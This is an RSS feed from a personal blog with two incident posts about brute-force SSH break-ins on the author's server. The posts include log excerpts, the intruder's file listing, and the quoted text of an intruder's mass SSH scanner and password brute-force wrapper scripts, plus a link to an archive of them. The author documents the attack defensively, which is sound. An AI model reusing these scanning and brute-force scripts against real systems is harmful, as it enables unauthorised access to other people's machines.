<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0" 
   xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule" 
   xmlns:html="http://www.w3.org/1999/html" 
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" 
   xmlns:slash="http://purl.org/rss/1.0/modules/slash/">
<channel>
   <title>Parsed Participle</title>
   <link>http://parsedparticiple.org/blog</link>
   <description>Faiz's Web Journal</description>
   <language>en</language>
   <copyright>Copyright 2007 Faiz Kazi</copyright>
   <ttl>60</ttl>
   <pubDate>Sat, 25 Oct 2008 11:59 GMT</pubDate>
   <managingEditor>faiz@parsedparticiple.org</managingEditor>
   <generator>PyBlosxom http://pyblosxom.sourceforge.net/ 1.4.2 8/16/2007</generator>
<item>
   <title>./ulib - offending IP is 79.116.242.2</title>
   <guid isPermaLink="false">security/neo-ulib</guid>
   <link>http://parsedparticiple.org/blog/security/neo-ulib.html</link>
   <description><![CDATA[
Another break-in, this time by a brute-force SSH 
password-guess.  A rarely used user account called
neo was logged into from 79.116.242.2, and was
running a process that showed up like:
<pre class="code">
neo  3995  0.0  0.0   1592   4 ?  S  Oct20   0:00 ./ulib
</pre>
I wonder what it was actually doing.  A cursory
inspection of its open file descriptors showed
nothing interesting:

<pre class="code">
# ls -l /proc/3995/fd/
total 3
lrwx------ 1 neo neo 64 Oct 25 07:43 0 -&gt; /dev/pts/1 (deleted)
lrwx------ 1 neo neo 64 Oct 25 07:43 1 -&gt; /dev/pts/1 (deleted)
lrwx------ 1 neo neo 64 Oct 25 07:43 2 -&gt; /dev/pts/1 (deleted)
</pre>


The login occurred 5 days ago:
<pre class="code">
44571:Oct 20 19:17:08 faizkazi sshd[2972]: Accepted keyboard-interactive/pam for neo from 79.116.242.2 port 3106 ssh2
44572:Oct 20 19:17:08 faizkazi sshd[2986]: (pam_unix) session opened for user neo by (uid=0)
</pre>


]]></description>
   <category domain="http://parsedparticiple.org/blog"></category>
   <pubDate>Sat, 25 Oct 2008 11:59 GMT</pubDate>
</item>
<item>
   <title><em>Sod off,</em> loathsome script-kiddie</title>
   <guid isPermaLink="false">security/script-kiddie</guid>
   <link>http://parsedparticiple.org/blog/security/script-kiddie.html</link>
   <description><![CDATA[
Someone (or should I say, something, because this looks 
like some auto-scanning script) gained access via SSH
using one of the unused user accounts on this server.
Nothing very spectacular, especially since everything was
easily visible with <code>ps</code>, and even <code>who</code>.
The IP seems to be: <code>86.123.17.188</code>.
<p>
I could see this when I ran <code>who</code>:
<pre class="code">
faiz     pts/3        Nov 19 13:56 (p02a702.tokynt01.ap.so-net.ne.jp)
vasanth  pts/2        Nov 18 23:37 (86.123.17.188:S.0)
</pre>
</p>
<p>It looks like it never got beyond that, though I saw some hundreds of
'./ssh' processes running. After summarily killing them off, I found
and archived the offending scripts: these were stored in, and running from,
the directory <code>/var/tmp/vi.recover/irc/</code> as the user
'vasanth'. I suspect a weak password led to a brute-force SSH break-in.
Not at all a bother, and nothing that can't be fixed by an <code>iptables</code>
'<code>-m recent</code>' filter.
</p>
Contents of the directory the intruder was running the scripts from:
<pre class="code" style="height:120px;">
var/
`-- tmp
    `-- vi.recover
        `-- irc
            |-- 1
            |-- 10
            |-- 11
            |-- 12
            |-- 13
            |-- 14
            |-- 15
            |-- 16
            |-- 17
            |-- 18
            |-- 19
            |-- 2
            |-- 20
            |-- 209.85.ps.22
            |-- 21
            |-- 22
            |-- 23
            |-- 24
            |-- 25
            |-- 26
            |-- 27
            |-- 28
            |-- 29
            |-- 3
            |-- 30
            |-- 31
            |-- 32
            |-- 33
            |-- 34
            |-- 35
            |-- 36
            |-- 37
            |-- 38
            |-- 39
            |-- 4
            |-- 40
            |-- 41
            |-- 42
            |-- 43
            |-- 44
            |-- 45
            |-- 46
            |-- 47
            |-- 48
            |-- 49
            |-- 5
            |-- 50
            |-- 51
            |-- 52
            |-- 53
            |-- 54
            |-- 55
            |-- 56
            |-- 57
            |-- 58
            |-- 59
            |-- 6
            |-- 60
            |-- 61
            |-- 62
            |-- 63
            |-- 64
            |-- 7
            |-- 8
            |-- 9
            |-- all
            |-- common
            |-- full
            |-- go.sh
            |-- mfu.txt
            |-- pass_file
            |-- ps
            |-- r00t
            |-- skan
            |-- ss
            |-- ssh
            `-- x

</pre>
<p>Some samples from the <a href="/download/junk/kiddie-scripts.tar.gz">scripts:</a>
<em>Note: though no harm can come if you try running these binaries as a non-root
user (if you are running Linux, that is), it's probably a good idea not to run the
scripts in this archive - there's no easy way to be sure what they actually do.</em>
<pre class="code">
$ cat /var/tmp/vi.recover/irc/go.sh 
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq &gt; mfu.txt
./ssh-scan
rm -f bios.txt

</pre>
<pre class="code">
#!/bin/bash

clear

rm -rf $1.ps.$2

echo "#=====#==================================#=====#"
echo "#= R =# SSH AUTO SCANNER BY REGELE &amp; CO  #= R =#"
echo "#= E =#-------   #BlackCat TEAM   -------#= E =#"
echo "#= G =#----------------------------------#= G =#"
echo "#= E =# � ALL RIGHTS RESERVED TO Regele �#= E =#"
echo "#= L =#   Now Just Sit Back End Relax    #= L =#"
echo "#= E =#   IPs founder... ACTIVATING!!!   #= E =#"
echo "#Range from -&gt; $1.0.0"
echo "#Range   to -&gt; $1.255.255"
echo "#Looking on -&gt; PORT $2"

./ps $1 $2

sleep 5

cat $1.ps.$2 |sort |uniq &gt; mfu.txt

oopsnr2=`grep -c . mfu.txt`

sleep 5
echo "#---Relax ... Take it Easy---#"

cat 1 &gt; pass_file
sleep 3
./ssh 150

cat 2 &gt; pass_file
sleep 3
./ssh 150

#... and so on

echo "# It's over, you cand go outside and play now #"
</pre>
Yup, script 'kiddie' all right.
</p>

]]></description>
   <category domain="http://parsedparticiple.org/blog"></category>
   <pubDate>Mon, 19 Nov 2007 16:55 GMT</pubDate>
</item>
</channel>
</rss>
